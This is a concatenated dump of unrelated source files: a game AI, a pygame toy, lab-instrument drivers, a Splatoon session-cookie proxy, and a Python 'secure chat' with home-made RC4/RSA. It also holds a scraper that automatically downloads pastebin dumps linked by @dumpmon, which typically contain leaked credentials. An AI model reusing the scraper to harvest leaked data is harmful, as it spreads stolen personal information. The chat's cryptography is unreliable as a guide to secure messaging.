target = target.strip().rstrip("/")
targets = []
try:
for ip in IPNetwork(target).iter_hosts(): # (covers IP or cidr) #3,4
targets.append(Target(host=str(ip)))
except AddrFormatError:
if len(target.split(":")) == 3:
# mysql://127.0.0.1:3306
protocol = target.split(":")[0]
host = target.split(":")[1].replace("//", "")
port = target.split(":")[2]
targets.append(Target(host=host, port=port, protocol=protocol))
elif "://" in target:
# snmp://127.0.0.1
protocol = target.split(":")[0]
host = target.split(":")[1].replace("//", "")
targets.append(Target(host=host, protocol=protocol))
elif ":" in target:
# 127.0.0.1:8080
host = target.split(":")[0]
port = target.split(":")[1]
targets.append(Target(host=host, port=port))
else:
targets.append(Target(host=target))
return targets
``` |
{
"source": "0xHornet/Physballs",
"score": 3
} |
#### File: Physballs/physballs/controls.py
```python
import pygame
import sys
import ball
import random
import graphics.render as render
from ball import Ball
# TODO: Make it so you can select, edit, delete planets
def check_event(running):
for event in pygame.event.get():
# Check for mouse input
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
# TODO: make sure to implement mouse pos here
ball.add_ball(pygame.mouse.get_pos(), random.randint(5, 80), render.rand_color())
if event.type == pygame.QUIT:
running = False
sys.exit()
``` |
{
"source": "0xhtml/software-challenge-2020",
"score": 3
} |
#### File: software-challenge-2020/socha/board.py
```python
from xml.etree import ElementTree
import csocha
class Board:
def __init__(self, fields: dict, obstructed: set):
self.fields = fields
self.obstructed = obstructed
self.cache = {}
def empty(self) -> frozenset:
if "empty" in self.cache:
return self.cache["empty"]
empty = frozenset(csocha.empty(self.fields))
self.cache["empty"] = empty
return empty
def nonempty(self) -> frozenset:
if "nonempty" in self.cache:
return self.cache["nonempty"]
nonempty = frozenset(csocha.nonempty(self.fields))
self.cache["nonempty"] = nonempty
return nonempty
def color(self, color: str) -> frozenset:
if "color" + color in self.cache:
return self.cache["color" + color]
positions = frozenset(csocha.color(self.fields, color))
self.cache["color" + color] = positions
return positions
def parse(xml: ElementTree.Element) -> Board:
fields = {}
obstructed = set()
for field in xml.findall("fields/field"):
x = int(field.get("x"))
y = int(field.get("y"))
if field.get("isObstructed") == "true":
obstructed.add((x, y))
else:
pieces = []
for piece in field:
pieces.append((piece.get("owner"), piece.get("type")))
fields[(x, y)] = pieces
return Board(fields, obstructed)
```
#### File: software-challenge-2020/socha/gamestate.py
```python
from xml.etree import ElementTree
import csocha
from . import board, moves
class GameState:
def __init__(self, c: str, t: int, b: board.Board, undep: list):
self.color = c
self.opponent = "BLUE" if c == "RED" else "RED"
self.turn = t
self.board = b
self.undeployed = undep
def is_connected(self, fields: set) -> bool:
visited = [fields.pop()]
while len(visited) > 0:
neighbours = fields.intersection(csocha.neighbours(visited.pop(0)))
fields.difference_update(neighbours)
visited.extend(neighbours)
return len(fields) == 0
def can_be_disconnected(self, piece: set) -> bool:
nonempty = self.board.nonempty()
if len(nonempty) == 1:
return True
neighbours = csocha.neighbours(piece)
length = len(nonempty.intersection(neighbours))
if length < 2 or length > 5:
return True
return self.is_connected(set(nonempty).difference({piece}))
def get_possible_moves(self) -> set:
# Get possible set moves
possible_moves = self.get_possible_set_moves()
# Add possible drag moves
possible_moves.update(self.get_possible_drag_moves())
# If no move is possible, add skip move
if len(possible_moves) == 0:
possible_moves.add(moves.SkipMove())
# Return possible moves
return possible_moves
def get_possible_set_moves(self) -> set:
# First turn
if self.turn == 0:
# All empty fields are possible
dests = self.board.empty()
# Second turn
elif self.turn == 1:
# Get first set piece
field = self.board.color(self.opponent).__iter__().__next__()
# Get empty fields next to first piece
dests = self.board.empty().intersection(csocha.neighbours(field))
# All other turns
else:
# Get own pieces
dests = self.board.color(self.color)
# Get neighbours of own pieces
dests = {y for x in dests for y in csocha.neighbours(x)}
# Only empty fields
dests.intersection_update(self.board.empty())
# Get opponent pieces
opponent = self.board.color(self.opponent)
# Get neighbours of opponent pieces
opponent = {y for x in opponent for y in csocha.neighbours(x)}
# Only fields not next to opponent pieces
dests = dests.difference(opponent)
# If bee isn't set until fith turn player has to set bee
if (self.turn > 5 and (self.color, "BEE") in self.undeployed):
types = {"BEE"}
else:
types = {x[1] for x in self.undeployed if x[0] == self.color}
# Return all combinations of pieces and destinations
return {
moves.SetMove((self.color, y), x)
for x in dests
for y in types
}
def get_possible_drag_moves(self) -> set:
# Drag moves are only possible when bee is set
if (self.color, "BEE") in self.undeployed:
return set()
possible_moves = set()
# Loop through all set pieces
for position in self.board.color(self.color):
# When there is no piece under piece
if len(self.board.fields[position]) == 1:
if not self.can_be_disconnected(position):
continue
else:
# Piece is stacked therefore has to be a beetle
dests = self.get_beetle_move_dests(position)
# Call function to get piece type specific destinations
if self.board.fields[position][-1][1] == "BEETLE":
dests = self.get_beetle_move_dests(position)
elif self.board.fields[position][-1][1] == "BEE":
dests = self.get_bee_move_dests(position, position)
elif self.board.fields[position][-1][1] == "SPIDER":
dests = self.get_spider_move_dests(position)
elif self.board.fields[position][-1][1] == "ANT":
dests = self.get_ant_move_dests(position)
elif self.board.fields[position][-1][1] == "GRASSHOPPER":
dests = self.get_grasshopper_move_dests(position)
else:
continue
# Add all destinations to possible_moves
possible_moves.update(moves.DragMove(position, x) for x in dests)
# Return possible moves
return possible_moves
def get_beetle_move_dests(self, pos: tuple) -> set:
# Get neighbours of pos
all_neighbours = csocha.neighbours(pos)
# Only take fields with pieces
neighbours = set(self.board.nonempty().intersection(all_neighbours))
# If we are on top of another piece add it aswell
if len(self.board.fields[pos]) > 1:
neighbours.add(pos)
# Get fields next to fields
dests = {y for x in neighbours for y in csocha.neighbours(x)}
# Only take fields in reach
dests.intersection_update(all_neighbours)
# Only take valid fields
dests.intersection_update(self.board.fields.keys())
# Return fields
return dests
def get_bee_move_dests(self, pos: tuple, start_pos: tuple) -> set:
# Get neighbours of pos
all_neighbours = csocha.neighbours(pos)
# Only take fields with pieces
neighbours = set(self.board.nonempty().intersection(all_neighbours))
# Remove own field
neighbours.discard(start_pos)
# Get fields next to fields
dests = set()
for neighbour in neighbours:
dests = dests.symmetric_difference(csocha.neighbours(neighbour))
# Get obstructed fields
obstructed = self.board.obstructed.copy()
# Only take obstructed fields in reach
obstructed.intersection_update(all_neighbours)
# Get fields next to obscructed fields
obstructed = (y for x in obstructed for y in csocha.neighbours(x))
# Remove fields next to obstructed
dests = dests.difference(obstructed)
# Only take fields in reach
dests.intersection_update(all_neighbours)
# Only take empty fields
dests.intersection_update(self.board.empty())
# Return fields
return dests
def get_spider_move_dests(self, pos: tuple) -> set:
dests = {pos}
all_dests = dests.copy()
for _ in range(3):
dests = {
y
for x in dests
for y in self.get_bee_move_dests(x, pos)
}.difference(all_dests)
all_dests.update(dests)
return dests
def get_ant_move_dests(self, pos: tuple) -> set:
found = set()
todo = {pos}
while len(todo) > 0:
dest = todo.pop()
found.add(dest)
dests = self.get_bee_move_dests(dest, pos).difference(found)
todo.update(dests)
found.discard(pos)
return found
def get_grasshopper_move_dests(self, pos: tuple) -> set:
dests = set()
for direction in [(1, 0), (1, -1), (0, -1), (-1, 0), (-1, 1), (0, 1)]:
dest = (pos[0] + direction[0], pos[1] + direction[1])
if dest in self.board.empty():
continue
while dest in self.board.nonempty():
dest = (dest[0] + direction[0], dest[1] + direction[1])
dests.add(dest)
dests.intersection_update(self.board.empty())
return dests
def get_bee(self, color: str) -> tuple:
# Loop through all fields
for position, pieces in self.board.fields.items():
# If bee is on this field return it
if len(pieces) > 0 and pieces[0] == (color, "BEE"):
return position
# Bee is not set jet, return none
return None
def game_ended(self):
# Game can only end if color is blue
if self.color != "RED":
return False
# Get empty fields for use later
empty = self.board.empty()
# Get own bee
ownbee = self.get_bee(self.color)
# If own bee is set
if ownbee is not None:
# If own bee has been surrounded, game has ended
if len(set(csocha.neighbours(ownbee)).difference(empty)) == 6:
return True
# Get opponent bee
oppbee = self.get_bee(self.opponent)
# If opponent bee is set
if oppbee is not None:
# If opponent bee has been surrounded, game has ended
if len(set(csocha.neighbours(oppbee)).difference(empty)) == 6:
return True
# If turn limit is reach, game has ended
return self.turn >= 60
def hash(self, depth: int) -> bytes:
if self.turn > 7 and self.turn < 60 - depth:
return csocha.hash(self.board.fields) + str(self.color).encode()
return csocha.hash(self.board.fields) + str(self.turn).encode()
def parse(xml: ElementTree.Element) -> GameState:
color = xml.get("currentPlayerColor")
turn = int(xml.get("turn"))
_board = board.parse(xml.find("board"))
undeployed = []
for piece in xml.findall("*/piece"):
undeployed.append((piece.get("owner"), piece.get("type")))
return GameState(color, turn, _board, undeployed)
``` |
{
"source": "0xhughes/dumpmon_tweeter_scraper",
"score": 3
} |
#### File: 0xhughes/dumpmon_tweeter_scraper/tweeter_scraper.py
```python
import urllib2
import time
import os
import datetime
import sys
from random import randint
def menu():
sane = 1
while sane == 1:
print "[ - ] Please enter absolute path to output directory: "
in_path = raw_input()+"\\tweeter_scraper_out"
if os.path.exists(in_path):
sane = 0
else:
try:
os.mkdir(in_path)
sane = 0
except:
os.system('cls' if os.name == 'nt' else 'clear')
print "[ - ] Invalid path, try again."
return(in_path)
def main(in_path):
print "[ + ] Gathering information..."
in_path = in_path
target_list = []
done_list = []
cnt = 0
while True:
if cnt != 0:
rand = randint(5,180)
print "[ - ] Sleeping "+str(rand)+" seconds until check for new items."
time.sleep(rand)
try:
resp = urllib2.urlopen("https://twitter.com/dumpmon")
except:
tmp_t = randint(360,720)
time.sleep(tmp_t)
print "[ - ] Communication error, sleeping "+str(tmp_t)+" seconds..."
html = resp.readlines()
out_log = in_path+"\\out_log.txt"
out_log_fo = open(out_log, 'a+')
out_log_items = out_log_fo.readlines()
for done in out_log_items:
if done.strip() not in done_list:
done_list.append(done.strip())
for line in html:
if "data-expanded-url=" in line:
startCut = line.find('data-expanded-url=')+18
endCut = line[startCut:len(line)].find(' class=')+startCut
target = line[startCut+1:endCut-1]
target_list.append(target)
for targ in target_list:
if targ not in done_list:
try:
time.sleep(randint(1,15))
resp = urllib2.urlopen(targ)
except urllib2.HTTPError:
print "[ - ] Caught a 404, will try one more time in 2-4 minutes..."
time.sleep(randint(120,240))
try:
resp = urllib2.urlopen(targ)
except urllib2.HTTPError:
print "[ - ] 404, "+targ+", skipping, "+str(time.strftime("%m%d%y_%H%M%S"))
out_log_fo.write(targ+"\n")
continue
html = resp.read()
if html.strip() == "Please refresh the page to continue...":
page = "http://pastebin.com/"+targ[targ.rfind("=")+1:len(targ)]
print "[ - ] Attempting... "+page
resp = urllib2.urlopen(page)
html = resp.read()
start_raw_cut = html.find('<textarea id="paste_code" class="paste_code" name="paste_code" onkeydown="return catchTab(this,event)">')+103
end_raw_cut = html[start_raw_cut:len(html)].find('</textarea>')+start_raw_cut
html = html[start_raw_cut:end_raw_cut]
time_det = str(time.strftime("%m%d%y_%H%M%S"))
dump_file = in_path+"\\"+time_det+'.txt'
dump_file_fo = open(dump_file, 'w')
dump_file_fo.write(html)
dump_file_fo.close()
done_list.append(targ)
out_log_fo.write(targ+"\n")
print "[ + ] Dump "+targ+" grabbed @ "+str(time.strftime("%m%d%y_%H%M%S"))
out_log_fo.close()
cnt+=1
print "[ - ] Checked "+str(cnt)+" times."
out_log_fo.close()
try:
main(menu())
except KeyboardInterrupt:
print "[ - ] Interrupt caught, exiting."
sys.exit(0)
``` |
{
"source": "0xhunter213/python3_secure_chat",
"score": 3
} |
#### File: 0xhunter213/python3_secure_chat/message_client.py
```python
import socket
import sys
from rc4 import enc, dec
from rsa import *
from Crypto.Util.number import *
import threading
import os
from message_threads import *
def recieve_msg(conn, key):
while True:
msgRcv = conn.recv(1024)
if msgRcv != b'':
msg = dec(msgRcv.decode(), key)
print("SENDER:" + msg)
print(f'THIS is the enc: {msgRcv}')
if "quit" == msg or "exit" == msg:
exit(0)
def send_msg(conn, key):
while True:
data = input()
if data != '':
msg = enc(data, key)
print(msg)
conn.sendall(msg.encode())
print('ME: ', data)
if "quit" == data or "exit" == data:
exit(0)
if(len(sys.argv) < 2):
print('[x] USAGE: message HOST PORT')
os.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
e, n, d = key_gen(1024)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
data = ('INTZ'+':'+str(e)+':'+str(n)).encode()
print(data)
client.sendall(data)
data = client.recv(1024)
msg = bytes_to_long(data)
key = long_to_bytes(pow(msg, d, n)).decode()
print(f'we recv this: {key}')
client.sendall(enc('we recv the key', key).encode())
data = client.recv(1024)
dec(data.decode(), key)
client.sendall(b'')
t1 = threading.Thread(target=send_msg, args=(client, key))
t2 = threading.Thread(target=recieve_msg, args=(client, key))
t1.start()
t2.start()
```
#### File: 0xhunter213/python3_secure_chat/rc4.py
```python
from binascii import hexlify
def key_init(key):
s = []
for i in range(256):
s.append(i)
j = 0
for i in range(256):
j = (j + s[i] + ord(key[i % len(key)])) % 256
s[i], s[j] = s[j], s[i]
return s
def enc(msg, key):
s = key_init(key)
i = 0
j = 0
res = []
for c in msg:
i = (i + 1) % 256
j = (j + s[i]) % 256
s[i], s[j] = s[j], s[i]
oct_enc = s[(s[i]+s[j]) % 256]
res.append(chr(oct_enc ^ ord(c)))
return ''.join(res)
def dec(enc, key):
s = key_init(key)
i = 0
j = 0
res = []
for c in enc:
i = (i + 1) % 256
j = (j + s[i]) % 256
s[i], s[j] = s[j], s[i]
oct_enc = s[(s[i]+s[j]) % 256]
res.append(chr(oct_enc ^ ord(c)))
return ''.join(res)
def main():
while True:
msg = input("Enter a message:")
key = input("Enter a key:")
enc_msg = enc(msg, key)
print(f"Encrypted msg:{enc_msg}")
print(f"Encrypted msg in hex:{hexlify(enc_msg.encode()).decode()}")
dec_msg = dec(enc_msg, key)
print(f"Decrypted msg:{dec_msg}")
if __name__ == "__main__":
main()
``` |
{
"source": "0xicl33n/Splatnet2-Rich-Presence",
"score": 3
} |
#### File: 0xicl33n/Splatnet2-Rich-Presence/nso_functions.py
```python
import json
import requests
import time
import sys
import os
import socket
from config.logger import logger
def get_config_file():
'''Get the data from the config file, and create it if not present'''
try:
with open("config/config.txt") as config_f:
config_data = json.loads(config_f.read())
except FileNotFoundError:
config_to_write = {"api_key": "", "cookie": "", "friend_code": "",
"session_token": "skip", "user_lang": ""}
with open("config/config.txt", "w") as config_f:
config_f.write(json.dumps(config_to_write, indent=4))
config_data = get_config_file()
return config_data
def start_credential_proxy():
status_code = os.system(
"mitmdump -s ./config/get_session.py -q --set onboarding_host=setup.ink")
if bool(status_code):
sys.exit(1)
class NSOInterface:
def reload_config(self, config_data=None):
'''Reload the config, such as after the cookie has changed'''
if config_data is None:
config_data = get_config_file()
self.cookie = config_data['cookie']
return config_data
def __init__(self, config_data=None):
config_data = self.reload_config(config_data=config_data)
# only works with your game region's supported languages
USER_LANG = config_data["user_lang"]
if "app_timezone_offset" in config_data:
app_timezone_offset = str(config_data["app_timezone_offset"])
else:
app_timezone_offset = str(int(time.timezone/60))
if "app_unique_id" in config_data:
app_unique_id = str(config_data["app_unique_id"])
else:
# random 19-20 digit token. used for splatnet store
app_unique_id = "46674186337252616651"
if "app_user_agent" in config_data:
app_user_agent = str(config_data["app_user_agent"])
else:
app_user_agent = 'Mozilla/5.0 (Linux; Android 7.1.2; Pixel Build/NJH47D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36'
self.app_head = {
'Host': 'app.splatoon2.nintendo.net',
'x-unique-id': app_unique_id,
'x-requested-with': 'XMLHttpRequest',
'x-timezone-offset': app_timezone_offset,
'User-Agent': app_user_agent,
'Accept': '*/*',
'Referer': 'https://app.splatoon2.nintendo.net/home',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': USER_LANG
}
def gen_new_cookie(self, reason):
'''Starts proxy to get new cookie from a user'''
logger.warn(
"Cookie invalid - reason: {} - loading proxy to regenerate".format(reason))
logger.info("In order to get a new token, we need to intercept it from the real NSO app. Please make sure you have a smartphone or Android emulator to continue.")
logger.info(
"If your smartphone runs Android 7.0 or higher, you will need to use an Android emulator or an iOS device to continue.")
start_credential_proxy()
def load_json(self, api_method):
'''Returns results JSON from online.'''
url = "https://app.splatoon2.nintendo.net/api/{}".format(api_method)
logger.debug("Pulling data from {}".format(url))
results_list = requests.get(
url, headers=self.app_head, cookies=dict(iksm_session=self.cookie))
results_data = json.loads(results_list.text)
try:
if results_data["code"] == "AUTHENTICATION_ERROR":
self.gen_new_cookie("auth")
# recursively call ourselves to try again
results_data = self.load_json(api_method)
except KeyError:
pass
return results_data
def load_results(self, calledby="", salmonrun=True):
'''Returns the data we need from the results JSON, if possible.
Params:
salmonrun - Set to false if you don't want to merge in salmonrun data'''
data = self.load_json("results")
results = data['results']
if salmonrun:
salmonrun_data = self.load_json("coop_results")
for coop_match in salmonrun_data['results']:
for x in range(0, len(results)):
pvp_match = results[x]
if pvp_match['start_time'] < coop_match['start_time']:
results.insert(x, coop_match)
break
return results
``` |
{
"source": "0xInfty/lantz-drivers",
"score": 2
} |
#### File: drivers/aeroflex/a2023a.py
```python
import enum
from lantz.core import Feat, Action, MessageBasedDriver
from lantz.core.mfeats import BoolFeat, QuantityFeat, QuantityDictFeat, EnumFeat
class A2023a(MessageBasedDriver):
"""Aeroflex Test Solutions 2023A 9 kHz to 1.2 GHz Signal Generator.
"""
DEFAULTS = {'ASRL': {'write_termination': '\n',
'read_termination': chr(256)}}
#: Carrier frequency.
frequency = QuantityFeat(('CFRQ?', ':CFRQ:VALUE {0:f};{_}'),
'CFRQ:VALUE {0:f}HZ', units='Hz')
#: RF amplitude.
amplitude = QuantityFeat(('RFLV?', ':RFLV:UNITS {_};TYPE {_};VALUE {0:f};INC {_};<status>'),
'RFLV:VALUE {0:f}V', units='V')
#: Offset amplitude.
offset = QuantityFeat(('RFLV:OFFS?', ':RFLV:OFFS:VALUE {0:f};{_}'),
'RFLV:OFFS:VALUE {0:f}', units='V')
#: Enable or disable the RF output
output_enabled = BoolFeat('OUTPUT?', 'OUTPUT:{}', 'ENABLED', 'DISABLED')
#: Phase offset
phase = QuantityFeat(('CFRQ?', ':CFRQ:VALUE {:f}; INC {_};MODE {_}'), 'CFRQ:PHASE {}', units='degree')
#: Get internal or external frequency standard.
class FREQUENCY_STANDARD(enum):
INT = 'INT'
EXT10DIR = 'EXT10DIR'
EXTIND = 'EXTIND'
EXT10IND = 'EXT10IND'
INT10OUT = 'INT10OUT'
#: Set RF output level max.
rflimit = QuantityFeat('RFLV:LIMIT?', 'RFLV:LIMIT {}')
def remote(self, value):
if value:
self.write('^A')
else:
self.write('^D')
@Action(units='ms')
def expose(self, exposure_time=1):
self.write('EXPOSE {}'.format(exposure_time))
@Feat(values={True: 'on', False: 'off'})
def time(self):
# TODO: ??
self.write('')
return self.read()
@time.setter
def time(self, value):
self.write("vlal ".format(value))
def local_lockout(self, value):
if value:
self.write('^R')
else:
self.write('^P')
def software_handshake(self, value):
if value:
self.write('^Q')
else:
self.write('^S')
if __name__ == '__main__':
import argparse
import lantz.log
parser = argparse.ArgumentParser(description='Test Kentech HRI')
parser.add_argument('-i', '--interactive', action='store_true',
default=False, help='Show interactive GUI')
parser.add_argument('-p', '--port', type=str, default='17',
help='Serial port to connect to')
args = parser.parse_args()
lantz.log.log_to_socket(lantz.log.DEBUG)
with A2023a.from_serial_port(args.port) as inst:
if args.interactive:
from lantz.ui.app import start_test_app
start_test_app(inst)
else:
print(inst.idn)
inst.fstd = "EXT10DIR"
print(inst.fstd)
print(inst.freq)
inst.freq = 41.006
print(inst.rflevel)
inst.rflevel = -13
inst.phase=0
print(inst.phase)
inst.phase=30
print(inst.phase)
inst.phase=60
print(inst.phase)
```
#### File: drivers/agilent/ag81130a.py
```python
from lantz.messagebased import MessageBasedDriver
from lantz import Feat, DictFeat, Action
from collections import OrderedDict
#from lantz import Q_
import numpy as np
import socket
import warnings
class Ag81130A(MessageBasedDriver):
"""
Lantz driver for interfacing with Agilent 81130A pulse pattern generator.
Includes testing code, which should work out of the box assuming you give
it the correct GPIB address.
Author: <NAME>
Date: 12/6/2016
Version: 0.1
"""
DEFAULTS = {
'COMMON': {
'write_termination': '\n',
'read_termination': '\n',
}
}
ON_OFF_VALS = OrderedDict([
('on', 1),
('off', 0),
])
ARM_SOURCE_VALS = OrderedDict([
('immediate', 'IMM'),
('external', 'EXT'),
('manual', 'MAN')
])
TRIG_SOURCE_VALS = OrderedDict([
('immediate', 'IMM'),
('external', 'EXT'),
('internal', '1')
])
TRIG_MODE_VALS = OrderedDict([
('continuous', 'CONT'),
('start', 'STAR')
])
channels = range(1,3)
#channels = OrderedDict([
# ('1', 0),
# ('2', 1)
# ])
segments = range(1,5)
# some weird list comprehension variable scope thing here
chan_segs = [(x,y) for x in range(1,3) for y in range(1,5)]
@Feat()
def idn(self):
"""
Identifiies the instrument.
"""
return self.query('*IDN?')
@Action()
def reset(self):
"""
Resets the instrument to default settings. This is recommended by the
manual before starting to programming it.
"""
return self.write('*RST')
@DictFeat(keys=channels, limits=(-4.0,4.0))
def volt_high(self, chan):
"""
Returns the voltage corresponding to HIGH for channel chan.
"""
return self.query('VOLT{}:HIGH?'.format(chan))
@volt_high.setter
def volt_high(self, chan, volts):
"""
Sets the voltage corresponding to HIGH for channel chan to volts.
"""
return self.write('VOLT{}:HIGH {}V'.format(chan, volts))
@DictFeat(keys=channels, limits=(-4.0,4.0))
def volt_low(self, chan):
"""
Returns the voltage corresponding to LOW for channel chan.
"""
return self.query('VOLT{}:LOW?'.format(chan))
@volt_low.setter
def volt_low(self, chan, volts):
"""
Sets the voltage corresponding to LOW for channel chan to volts.
"""
return self.write('VOLT{}:LOW {}V'.format(chan, volts))
@Feat(values=ON_OFF_VALS)
def display(self):
"""
Returns if display is on or off, (off enables faster programming).
"""
return int(self.query('DISP?'))
@display.setter
def display(self, on_off):
"""
Sets display to be on or off, (off enables faster programming).
"""
return self.write('DISP {}'.format(on_off))
@Feat(values=ON_OFF_VALS)
def pattern_mode(self):
"""
Returns whether or not pattern mode is enabled.
"""
return int(self.query('DIG:PATT?'))
@pattern_mode.setter
def pattern_mode(self, on_off):
"""
Sets pattern mode to be enabled or disabled.
"""
return self.write('DIG:PATT {}'.format(on_off))
@Feat(values=ARM_SOURCE_VALS)
def arm_source(self):
"""
Returns the source used for the arming signal for triggering the instrument.
Options are immediate (continuous mode), external trigger, and manually
triggered from the keypad.
"""
return self.query('ARM:SOUR?')
@arm_source.setter
def arm_source(self, source_channel):
"""
Sets the trigger signal to the source channel.
Options are immediate (continuous mode), external trigger, and manually
triggered from the keypad.
"""
return self.write('ARM:SOUR {}'.format(source_channel))
@Feat(values=TRIG_SOURCE_VALS)
def trigger_source(self):
"""
Returns the source of the pulse period trigger signal.
Options are immediate, internal, or external (CLK IN signal)
"""
return self.query('TRIG:SOUR?')
@trigger_source.setter
def trigger_source(self, trigger_source):
"""
Sets the source of the pulse period trigger signal.
Options are immediate, internal, or external (CLK IN signal)
"""
return self.write('TRIG:SOUR {}'.format(trigger_source))
@DictFeat(keys=segments)
def dig_patt_length(self, seg_num, limits=(0,65504,1)):
"""
Returns the segment type
"""
return int(self.query('DIG:PATT:SEGM{}:LENG?'.format(seg_num)))
@dig_patt_length.setter
def dig_patt_length(self, seg_num, length):
return self.write('DIG:PATT:SEGM{}:LENG {}'.format(seg_num, int(length)))
@DictFeat(keys=chan_segs, values={'data':'DATA', 'PRBS':'PRBS', 'high':'HIGH', 'low':'LOW'})
def dig_patt_type(self, chan_seg):
"""
Returns the segment type
"""
channel = chan_seg[0]
seg_num = chan_seg[1]
return self.query('DIG:PATT:SEGM{}:TYPE{}?'.format(seg_num, channel))
@dig_patt_type.setter
def dig_patt_type(self, chan_seg, patt_type):
channel = chan_seg[0]
seg_num = chan_seg[1]
return self.write('DIG:PATT:SEGM{}:TYPE{} {}'.format(seg_num, channel, patt_type))
@Feat(limits=(1e3,660e6))
def frequency(self):
"""
Gets the operating frequency of the device - this is what sets the timescale
of the pattern duration.
"""
return float(self.query('FREQ?'))
@frequency.setter
def frequency(self, Hz):
"""
Sets the internal PLL frequency to Hz.
"""
return self.write('FREQ {}'.format(Hz))
@DictFeat(keys=channels, values={'nrz':'NRZ', 'rz':'RZ', 'r1':'R1'})
def data_format(self, channel):
"""
Returns current data format for the given channel.
Options are:
- nrz (non-return to zero)
- rz (return to zero)
- r1 (?)
"""
return self.query('DIG:SIGN{}:FORM?'.format(channel))
@data_format.setter
def data_format(self, channel, data_format):
"""
Sets data format of the given channel to data_format.
Options are:
- nrz (non-return to zero)
- rz (return to zero)
- r1 (?)
"""
return self.write('DIG:SIGN{}:FORM {}'.format(channel, data_format))
@DictFeat(keys=channels, values=ON_OFF_VALS)
def output_on(self, channel):
"""
Queries the output of the specified channel.
"""
return int(self.query('OUTP{}?'.format(channel)))
@output_on.setter
def output_on(self, channel, state):
"""
Sets the output of the specified channel to state.
"""
return self.write('OUTP{} {}'.format(channel, state))
@DictFeat(keys=channels, values=ON_OFF_VALS)
def comp_output_on(self, channel):
"""
Queries the output of the specified channel.
"""
return int(self.query('OUTP{}:COMP ?'.format(channel)))
@comp_output_on.setter
def comp_output_on(self, channel, state):
"""
Sets the output of the specified channel to state.
"""
return self.write('OUTP{}:COMP {}'.format(channel, state))
@DictFeat(keys=chan_segs)
def segment_data(self, chan_seg):
"""
Returns the data from segment seg_num, channel chan
"""
channel = chan_seg[0]
seg_num = chan_seg[1]
result = self.query('DIG:PATT:SEGM{}:DATA{}?'.format(seg_num, channel))
# now process data
return result
@segment_data.setter
def segment_data(self, chan_seg, data_stream):
"""
Sets the data from segment seg_num, channel chan to data_stream (numpy array)
"""
print('called data setter')
channel = chan_seg[0]
seg_num = chan_seg[1]
data = self.encode_data(data_stream[0])
self.write('DIG:PATT:SEGM{}:DATA{} {}'.format(seg_num, channel, data))
return data
@Feat(limits=(1,5,1))
def start_seg(self):
"""
Queries the starting segment for the device pattern.
"""
return int(self.query('DIG:PATT:LOOP:STAR?'))
@start_seg.setter
def start_seg(self, segment):
"""
Sets the starting segment for the device pattern to segment.
"""
return self.write('DIG:PATT:LOOP:STAR {}'.format(segment))
@Feat(limits=(1,5,1))
def loop_length(self):
"""
Queries the number of segments to be repeated in the loop.
"""
return int(self.query('DIG:PATT:LOOP:LENG?'))
@loop_length.setter
def loop_length(self, length):
"""
Sets the number of segments to be included in the loop.
"""
return self.write('DIG:PATT:LOOP:LENG {}'.format(length))
@DictFeat(keys=channels, limits=(0, 2*np.pi))
def phase_delay(self, chan):
"""
Returns the phase delay of the output signal of channel chan, in radians.
"""
return float(self.query('PHAS{}?'.format(chan)))
@phase_delay.setter
def phase_delay(self, chan, delay):
"""
Sets the phase delay of the output signal of channel chan to delay, in radians.
"""
return self.write('PHAS{} {}'.format(chan, delay))
@DictFeat(keys=channels, limits=(0, 3000e-9))
def timed_delay(self, chan):
"""
Returns the timed delay of the output signal of channel chan in seconds.
"""
return float(self.query('PULS:DEL{}?'.format(chan)))
@timed_delay.setter
def timed_delay(self, chan, sec):
"""
Sets the timed delay of output of channel chan to sec.
"""
return self.write('PULS:DEL{} {}S'.format(chan, sec))
@Feat()
def trig_output(self):
"""
Returns the voltage level used for trigger output.
"""
return self.query('PULS:TRIG:VOLT?')
@Feat()
def trig_pos(self):
"""
Returns the trigger out position in pattern mode, returning the segment number.
"""
return self.query('PULS:TRIG:POS?')
@Feat(values=TRIG_MODE_VALS)
def trig_mode(self):
"""
Returns the trigger out generation mode in pattern mode.
"""
return self.query('PULS:TRIG:MODE?')
@trig_mode.setter
def trig_mode(self, trigger_mode):
"""
Sets the trigger out generation mode (pattern mode only). Options are
continuous or start.
"""
return self.write('PULS:TRIG:MODE {}'.format(trigger_mode))
def encode_data(self, data_series):
"""
Helper function to implement IEEE 488.2 7.7.6.2 program data protocol.
Encodes data_series (numpy byte array) into format that can be read by PPG.
"""
# starts with # character
data_string = '#'
# hack to avoid issues w/ ellipses in large np arrays
np.set_printoptions(threshold=65536)
raw_data = np.array_str(data_series, max_line_width=65536)
np.set_printoptions(threshold=1000)
# figure out length of data_series
data_length = data_series.size
# figure out length of length of data_series
len_data_length = len(str(data_length))
# add all this stuff
data_string += str(len_data_length)
data_string += str(data_length)
# TODO: fix import
#max_line_width avoids adding newline or whitespace
#raw_data = np.array_str(data_series, max_line_width=1000000)
data_string += raw_data[1:-1:2] #strips out left bracket, right bracket, and spaces
return data_string
def decode_data(self, encoded_series):
"""
Helper function to implement IEEE 488.2 7.7.6.2 program data protocol.
Decodes encoded_series from PPG into raw data that can be read.
"""
if encoded_series[0] != '#':
print('invalid encoded series!')
len_len = int(encoded_series[1])
char_list = list(encoded_series[2+len_len:])
return [int(x) for x in char_list]
def preview_wfm(self):
import matplotlib.pyplot as plt
# code to figure out timeseries + number of points
loop_start = self.start_seg
loop_len = self.loop_length
segments = [loop_start]
current_seg = loop_start
# probably not the best way possible to do this, but it works...
while loop_len > 1:
current_seg += 1
loop_len -= 1
if current_seg > 4:
segments.append(current_seg % 4)
else:
segments.append(current_seg)
patt_length = 0
for seg in segments:
patt_length += self.dig_patt_length[seg]
print('seg{}:{}'.format(seg, self.dig_patt_length[seg]))
print('Total length:{}'.format(patt_length))
freq = self.frequency
t = np.arange(0, patt_length, 1)/freq
chan1 = np.zeros(patt_length)
chan2 = np.zeros(patt_length)
current_index = 0
for seg in segments:
seg_type_1 = self.dig_patt_type[(1, seg)]
seg_type_2 = self.dig_patt_type[(2, seg)]
length = self.dig_patt_length[seg]
if seg_type_1 == 'low':
chan1[current_index:current_index+length] = 0
elif seg_type_1 == 'high':
chan1[current_index:current_index+length] = 1
elif seg_type_1 == 'data':
chan1[current_index:current_index+length] = self.segment_data[(1,seg)]
if seg_type_2 == 'low':
chan2[current_index:current_index+length] = 0
elif seg_type_2 == 'high':
